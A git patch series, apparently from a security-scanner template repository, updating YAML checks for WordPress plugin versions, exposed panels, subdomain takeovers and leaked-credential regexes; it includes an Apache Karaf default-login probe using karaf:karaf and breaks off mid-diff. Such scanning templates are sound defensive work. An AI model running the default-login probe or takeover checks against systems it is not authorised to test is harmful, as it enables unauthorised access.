detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.txt b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml index d5734751d0..8f19192809 100644 --- a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml +++ b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-yith-woocommerce-wishlist.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' From 9a27b19b3eb7ffe629326fb86c300a08d0c78249 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 15:12:36 +0530 Subject: [PATCH 0150/1133] Update karaf-default-login.yaml --- default-logins/apache/karaf-default-login.yaml | 17 ++++++----------- 1 file changed, 6 insertions(+), 11 deletions(-) diff --git a/default-logins/apache/karaf-default-login.yaml b/default-logins/apache/karaf-default-login.yaml index c8d2212aba..a3d895f444 100644 --- a/default-logins/apache/karaf-default-login.yaml +++ b/default-logins/apache/karaf-default-login.yaml @@ -7,12 +7,7 @@ info: description: Apache Karaf default login credentials were discovered. reference: - https://karaf.apache.org/manual/latest/webconsole - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cwe-id: CWE-1392 - remediation: Change default karaf password for a stronger one. - tags: apache,default-login,karaf + tags: default-login,apache,karaf requests: - raw: @@ -21,16 +16,16 @@ requests: Host: {{Hostname}} Authorization: Basic {{base64('karaf:karaf')}} - redirects: true - max-redirects: 1 - + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - "Apache Karaf Web Console" - - "http://karaf.apache.org" + - "Apache Karaf Web Console - Bundles" + - "Web Console</a>" + - "Log out</a>" condition: and - type: status From 5c2c2a8e07c78995a4a9eb65bf7438906b5c395b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 15:13:17 +0530 Subject: [PATCH 0151/1133] Update karaf-default-login.yaml --- default-logins/apache/karaf-default-login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/default-logins/apache/karaf-default-login.yaml b/default-logins/apache/karaf-default-login.yaml index a3d895f444..46e2b4b2a3 100644 --- a/default-logins/apache/karaf-default-login.yaml +++ b/default-logins/apache/karaf-default-login.yaml @@ -7,6 +7,9 @@ info: description: Apache Karaf default login credentials were discovered. reference: - https://karaf.apache.org/manual/latest/webconsole + metadata: + verified: true + shodan-query: realm="karaf" tags: default-login,apache,karaf requests: From 2b4175b7e6ef4d01e83423b848079051e937266b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 15:20:09 +0530 Subject: [PATCH 0152/1133] Update and rename exposed-panels/apache/apache-karaf-panel.yaml to technologies/apache/apache-karaf-panel.yaml --- exposed-panels/apache/apache-karaf-panel.yaml | 26 ------------------- technologies/apache/apache-karaf-panel.yaml | 21 +++++++++++++++ 2 files changed, 21 insertions(+), 26 deletions(-) delete mode 100644 exposed-panels/apache/apache-karaf-panel.yaml create mode 100644 technologies/apache/apache-karaf-panel.yaml diff --git a/exposed-panels/apache/apache-karaf-panel.yaml b/exposed-panels/apache/apache-karaf-panel.yaml deleted file mode 100644 index 9bdffb4115..0000000000 --- a/exposed-panels/apache/apache-karaf-panel.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: apache-karaf-panel - -info: - name: Apache Karaf Login Panel - author: s0obi - severity: info - description: An Apache Karaf login panel was detected. - classification: - cwe-id: CWE-200 - tags: apache,karaf,panel - -requests: - - method: GET - path: - - "{{BaseURL}}:8181/system/console" - - matchers-condition: and - matchers: - - type: word - words: - - "Basic realm=\"karaf\"" - part: header - - - type: status - status: - - 401 diff --git a/technologies/apache/apache-karaf-panel.yaml b/technologies/apache/apache-karaf-panel.yaml new file mode 100644 index 0000000000..d285acce99 --- /dev/null +++ b/technologies/apache/apache-karaf-panel.yaml @@ -0,0 +1,21 @@ +id: apache-karaf-panel + +info: + name: Apache Karaf Detect + author: s0obi + severity: info + metadata: + verified: true + shodan-query: realm="karaf" + tags: tech,apache,karaf + +requests: + - method: GET + path: + - "{{BaseURL}}/system/console" + + matchers: + - type: word + part: header + words: + - 'realm="karaf' From 6ff45ea0a06dd802cae4b67b4cfa200be9d7fdf3 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Dec 2022 13:24:27 +0000 Subject: [PATCH 0153/1133] Update credentials-disclosure.yaml https://regex101.com/r/L8AgnX/1 --- exposures/tokens/generic/credentials-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml index 3fb6782c16..d89477b96f 100644 --- a/exposures/tokens/generic/credentials-disclosure.yaml +++ b/exposures/tokens/generic/credentials-disclosure.yaml @@ -24,7 +24,7 @@ requests: - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zendesk[_-]?travis[_-]?github[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\s|=)" - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" From 2b92930bc46d1505526fd64d5bda5389aac02826 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Dec 2022 13:25:10 +0000 Subject: [PATCH 0154/1133] Update credential-exposure.yaml https://regex101.com/r/L8AgnX/1 --- file/keys/credential-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 94a0bd6093..b64fe66ec9 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -32,7 +32,7 @@ file: - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zendesk[_-]?travis[_-]?github[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\s|=)" - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" From 608a5df5224c775e409c1a920a7fe206638acc96 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Tue, 6 Dec 2022 18:27:05 +0100 Subject: [PATCH 0155/1133] Add files via upload --- exposed-panels/jcms-panel.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/jcms-panel.yaml diff --git a/exposed-panels/jcms-panel.yaml b/exposed-panels/jcms-panel.yaml new file mode 100644 index 0000000000..c8875742fd --- /dev/null +++ b/exposed-panels/jcms-panel.yaml @@ -0,0 +1,33 @@ +id: jcms-panel + +info: + name: Jalios JCMS Panel + author: righettod + severity: info + reference: + - https://www.jalios.com/ + metadata: + verified: true + shodan-query: html:"/jcms/" + tags: panel,jcms + +requests: + - method: GET + path: + - "{{BaseURL}}/jcms/front/privateLogin.jsp" + - "{{BaseURL}}/front/privateLogin.jsp" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Jalios JCMS" + - "JCMS_login" + - "/jcms/" + condition: or + + - type: status + status: + - 200 From ae886efeb74991057fb8c88fdec5ef7dc98b275e Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 13:19:12 -0500 Subject: [PATCH 0156/1133] Delete tictail-takeover.yaml This service doesn't exist anymore, since it was bought by shopify (more info: https://tictail.com/) --- takeovers/tictail-takeover.yaml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 takeovers/tictail-takeover.yaml diff --git a/takeovers/tictail-takeover.yaml b/takeovers/tictail-takeover.yaml deleted file mode 100644 index 7fa5f78c5e..0000000000 --- a/takeovers/tictail-takeover.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: tictail-takeover - -info: - name: tictail takeover detection - author: pdteam - severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - Host != ip - - - type: word - words: - - 'Building a brand of your own?' - - 'to target URL: <a href="https://tictail.com' - - 'Start selling on Tictail.' \ No newline at end of file From d75f4bef555ba76b1b81eefcef1d31d57a65f10a Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 13:23:33 -0500 Subject: [PATCH 0157/1133] Update uservoice-takeover.yaml --- takeovers/uservoice-takeover.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/takeovers/uservoice-takeover.yaml b/takeovers/uservoice-takeover.yaml index cc0cd9b81a..291f6d455f 100644 --- a/takeovers/uservoice-takeover.yaml +++ b/takeovers/uservoice-takeover.yaml @@ -5,8 +5,9 @@ info: author: MiryangJung severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,uservoice + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/163 + - https://hackerone.com/reports/269109 + tags: takeover,uservoice,hackerone requests: - method: GET From ccc880429b7ac3632f1b046472966cbea15abefb Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 13:35:56 -0500 Subject: [PATCH 0158/1133] Update wishpond-takeover.yaml 1. source https://www.wishpond.com/rf/136247?scid=74249&type=Merchant 2. To test this takeover is required a paid account. --- takeovers/wishpond-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/wishpond-takeover.yaml b/takeovers/wishpond-takeover.yaml index 2245a4f1b2..49ec343d4a 100644 --- a/takeovers/wishpond-takeover.yaml +++ b/takeovers/wishpond-takeover.yaml @@ -21,4 +21,4 @@ requests: - type: word words: - - https://www.wishpond.com/404?campaign=true \ No newline at end of file + - 'Oops! There isn’t a Wishpond Campaign published to this page.' From 6e9d903a33a66594fd213fe6dbeaa076eb4a80e2 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 13:55:23 -0500 Subject: [PATCH 0159/1133] Update hatenablog-takeover.yaml There's no reference in `Can I takeover XYZ?` It should be considered info since there are no indications this takeover is (still) possible. --- takeovers/hatenablog-takeover.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/takeovers/hatenablog-takeover.yaml b/takeovers/hatenablog-takeover.yaml index 2edbcc511f..6723798486 100644 --- a/takeovers/hatenablog-takeover.yaml +++ b/takeovers/hatenablog-takeover.yaml @@ -3,9 +3,7 @@ id: hatenablog-takeover info: name: hatenablog takeover detection author: pdteam - severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + severity: info tags: takeover requests: @@ -21,4 +19,4 @@ requests: - type: word words: - - 404 Blog is not found \ No newline at end of file + - 404 Blog is not found From 6fe5d65ae88e4cf805ca9534589a5d127458c328 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 14:05:34 -0500 Subject: [PATCH 0160/1133] Update zendesk-takeover.yaml --- takeovers/zendesk-takeover.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/takeovers/zendesk-takeover.yaml b/takeovers/zendesk-takeover.yaml index d49065c7ee..766fe8c069 100644 --- a/takeovers/zendesk-takeover.yaml +++ b/takeovers/zendesk-takeover.yaml @@ -5,8 +5,10 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/23 + - https://hackerone.com/reports/869605 + - https://hackerone.com/reports/759454 + tags: takeover,hackerone requests: - method: GET @@ -21,4 +23,6 @@ requests: - type: word words: - - this help center no longer exists \ No newline at end of file + - "this help center no longer exists" + - "Help Center Closed" + condition:or From e6bef498da4817e2621f5c494859920e87c5652f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 00:57:54 +0530 Subject: [PATCH 0161/1133] Update wishpond-takeover.yaml --- takeovers/wishpond-takeover.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/takeovers/wishpond-takeover.yaml b/takeovers/wishpond-takeover.yaml index 49ec343d4a..a3d746e18b 100644 --- a/takeovers/wishpond-takeover.yaml +++ b/takeovers/wishpond-takeover.yaml @@ -1,12 +1,12 @@ id: wishpond-takeover info: - name: wishpond takeover detection + name: Wishpond Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover + tags: takeover,wishpond requests: - method: GET @@ -21,4 +21,6 @@ requests: - type: word words: + - https://www.wishpond.com/404?campaign=true - 'Oops! There isn’t a Wishpond Campaign published to this page.' + condition: or From 163af85c58b8d89996fa2d207bd9ab62dd6f9a39 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:13:08 +0530 Subject: [PATCH 0162/1133] Update zendesk-takeover.yaml --- takeovers/zendesk-takeover.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/takeovers/zendesk-takeover.yaml b/takeovers/zendesk-takeover.yaml index 766fe8c069..d663753470 100644 --- a/takeovers/zendesk-takeover.yaml +++ b/takeovers/zendesk-takeover.yaml @@ -1,14 +1,14 @@ id: zendesk-takeover info: - name: zendesk takeover detection + name: Zendesk Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/23 - https://hackerone.com/reports/869605 - https://hackerone.com/reports/759454 - tags: takeover,hackerone + tags: takeover,zendesk requests: - method: GET @@ -25,4 +25,4 @@ requests: words: - "this help center no longer exists" - "Help Center Closed" - condition:or + condition: or From 7dbc68bae506618df83e605941d27ceb2f867a5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:16:06 +0530 Subject: [PATCH 0163/1133] Update hatenablog-takeover.yaml --- takeovers/hatenablog-takeover.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/takeovers/hatenablog-takeover.yaml b/takeovers/hatenablog-takeover.yaml index 6723798486..281634e3a3 100644 --- a/takeovers/hatenablog-takeover.yaml +++ b/takeovers/hatenablog-takeover.yaml @@ -1,10 +1,13 @@ id: hatenablog-takeover info: - name: hatenablog takeover detection + name: Hatenablog Takeover Detection author: pdteam - severity: info - tags: takeover + severity: high + reference: + - https://beaglesecurity.com/blog/vulnerability/hatenablog-takeover-detection.html + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover,hatenablog requests: - method: GET From 86ec3415d656f078e11e00bb5b17a78ba8a78adf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:21:48 +0530 Subject: [PATCH 0166/1133] Update hatenablog-takeover.yaml --- takeovers/hatenablog-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/hatenablog-takeover.yaml b/takeovers/hatenablog-takeover.yaml index 281634e3a3..a500827ac0 100644 --- a/takeovers/hatenablog-takeover.yaml +++ b/takeovers/hatenablog-takeover.yaml @@ -22,4 +22,4 @@ requests: - type: word words: - - 404 Blog is not found + - "404 Blog is not found" From 9d78358e920433a93041101372ea0ab112643f3a Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 14:55:14 -0500 Subject: [PATCH 0167/1133] Update smugmug-takeover.yaml --- takeovers/smugmug-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/smugmug-takeover.yaml b/takeovers/smugmug-takeover.yaml index 733121b3a8..9b97da4642 100644 --- a/takeovers/smugmug-takeover.yaml +++ b/takeovers/smugmug-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/60 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - '{"text":"Page Not Found"' \ No newline at end of file + - '{"text":"Page Not Found"' From 1976f446016c376d2505009f92e27fcebc9cbe9a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:30:02 +0530 Subject: [PATCH 0168/1133] Update smugmug-takeover.yaml --- takeovers/smugmug-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/smugmug-takeover.yaml b/takeovers/smugmug-takeover.yaml index 9b97da4642..4f2a70b42b 100644 --- a/takeovers/smugmug-takeover.yaml +++ b/takeovers/smugmug-takeover.yaml @@ -1,12 +1,12 @@ id: smugmug-takeover info: - name: smugmug takeover detection + name: Smugmug Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/60 - tags: takeover + tags: takeover,smugmug requests: - method: GET From 144ab46b57886e652c5d6eab789eca6362629c07 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:36:38 +0530 Subject: [PATCH 0171/1133] Create pypiserver-detect.yaml --- technologies/pypiserver-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/pypiserver-detect.yaml diff --git a/technologies/pypiserver-detect.yaml b/technologies/pypiserver-detect.yaml new file mode 100644 index 0000000000..47f2689737 --- /dev/null +++ b/technologies/pypiserver-detect.yaml @@ -0,0 +1,25 @@ +id: pypiserver-detect + +info: + name: PyPI Server Detect + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: html:"pypiserver" + tags: tech,pypiserver + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - 'Welcome to pypiserver' + + - type: status + status: + - 200 From 43751b9bacc8d6f5e98fec2e6b5c59897ecc0ac3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 6 Dec 2022 20:06:49 +0000 Subject: [PATCH 0172/1133] Auto Generated CVE annotations [Tue Dec 6 20:06:49 UTC 2022] :robot: --- takeovers/zendesk-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/zendesk-takeover.yaml b/takeovers/zendesk-takeover.yaml index d663753470..3924fa8bee 100644 --- a/takeovers/zendesk-takeover.yaml +++ b/takeovers/zendesk-takeover.yaml @@ -8,7 +8,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/23 - https://hackerone.com/reports/869605 - https://hackerone.com/reports/759454 - tags: takeover,zendesk + tags: takeover,zendesk,hackerone requests: - method: GET From 07694f7e4a124626be14780a04a06e5dee72cfc7 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:18:13 -0500 Subject: [PATCH 0173/1133] Update pantheon-takeover.yaml - Correct link to issue. - Medium article (wrote by me) --- takeovers/pantheon-takeover.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/takeovers/pantheon-takeover.yaml b/takeovers/pantheon-takeover.yaml index ae5bec6ffe..31d6e35ddf 100644 --- a/takeovers/pantheon-takeover.yaml +++ b/takeovers/pantheon-takeover.yaml @@ -5,7 +5,8 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/24 + - https://medium.com/bug-bounty/how-i-took-over-several-stanford-subdomains-also-let-me-explain-you-the-pain-to-report-it-d84b08704be8 tags: takeover requests: @@ -21,4 +22,4 @@ requests: - type: word words: - - "The gods are wise, but do not know of the site which you seek." \ No newline at end of file + - "The gods are wise, but do not know of the site which you seek." From e1e122de3bab010efe6237435a7202de125d7795 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:24:33 -0500 Subject: [PATCH 0174/1133] Update smartjob-takeover.yaml --- takeovers/smartjob-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/smartjob-takeover.yaml b/takeovers/smartjob-takeover.yaml index 4a87aceced..5d9ba6a9e5 100644 --- a/takeovers/smartjob-takeover.yaml +++ b/takeovers/smartjob-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/139 tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - Job Board Is Unavailable - This job board website is either expired - - This job board website is either expired or its domain name is invalid. \ No newline at end of file + - This job board website is either expired or its domain name is invalid. From 339be047324e69ef517877e7bd3329119f3adad3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:26:11 -0500 Subject: [PATCH 0175/1133] Update feedpress-takeover.yaml As the issue indicated, it's no longer vulnerable, since 2020/9. --- takeovers/feedpress-takeover.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/takeovers/feedpress-takeover.yaml b/takeovers/feedpress-takeover.yaml index 502704b37a..25b61071f8 100644 --- a/takeovers/feedpress-takeover.yaml +++ b/takeovers/feedpress-takeover.yaml @@ -3,9 +3,9 @@ id: feedpress-takeover info: name: Agilecrm Takeover Detection author: pdteam - severity: high + severity: info reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/80 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - 'The feed has not been found.' \ No newline at end of file + - 'The feed has not been found.' From 507926462d4bc6235cdf27cef78f8975f38e719e Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:27:53 -0500 Subject: [PATCH 0176/1133] Update mashery-takeover.yaml --- takeovers/mashery-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/mashery-takeover.yaml b/takeovers/mashery-takeover.yaml index 82cb049a6d..df7f87200d 100644 --- a/takeovers/mashery-takeover.yaml +++ b/takeovers/mashery-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/14 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - Unrecognized domain <strong> \ No newline at end of file + - Unrecognized domain <strong> From 34f274e8d767750ace1cd263dded0682fcf9a1f7 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:30:10 -0500 Subject: [PATCH 0177/1133] Update launchrock-takeover.yaml --- takeovers/launchrock-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/launchrock-takeover.yaml b/takeovers/launchrock-takeover.yaml index 6cfd145cf2..fe9129d337 100644 --- a/takeovers/launchrock-takeover.yaml +++ b/takeovers/launchrock-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/74 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. \ No newline at end of file + - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. From 02ab8f10150024ae3c76c1bf1dd288b1c152efd6 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:32:16 -0500 Subject: [PATCH 0178/1133] Update bigcartel-takeover.yaml --- takeovers/bigcartel-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/bigcartel-takeover.yaml b/takeovers/bigcartel-takeover.yaml index f696dc0946..8a5c2399d6 100644 --- a/takeovers/bigcartel-takeover.yaml +++ b/takeovers/bigcartel-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/158 tags: takeover requests: From 0b769d689754cd503a471a8cde8f5de2c5e5ad18 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:34:45 -0500 Subject: [PATCH 0179/1133] Update canny-takeover.yaml --- takeovers/canny-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/canny-takeover.yaml b/takeovers/canny-takeover.yaml index 8f7c242e09..c170a8e51d 100644 --- a/takeovers/canny-takeover.yaml +++ b/takeovers/canny-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/114 tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - 'Company Not Found' - 'There is no such company. Did you enter the right URL?' - condition: and \ No newline at end of file + condition: and From dfce14743c44301651b47712ef2a0fa6c1b3d893 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:41:54 -0500 Subject: [PATCH 0180/1133] Update aws-bucket-takeover.yaml --- takeovers/aws-bucket-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/aws-bucket-takeover.yaml b/takeovers/aws-bucket-takeover.yaml index 7eb506e5c5..e78aabeb1d 100644 --- a/takeovers/aws-bucket-takeover.yaml +++ b/takeovers/aws-bucket-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/36 tags: takeover,aws,bucket requests: From 39352833efc616697f848abbaf510aa732644df3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 09:47:35 +0530 Subject: [PATCH 0181/1133] Update pantheon-takeover.yaml --- takeovers/pantheon-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 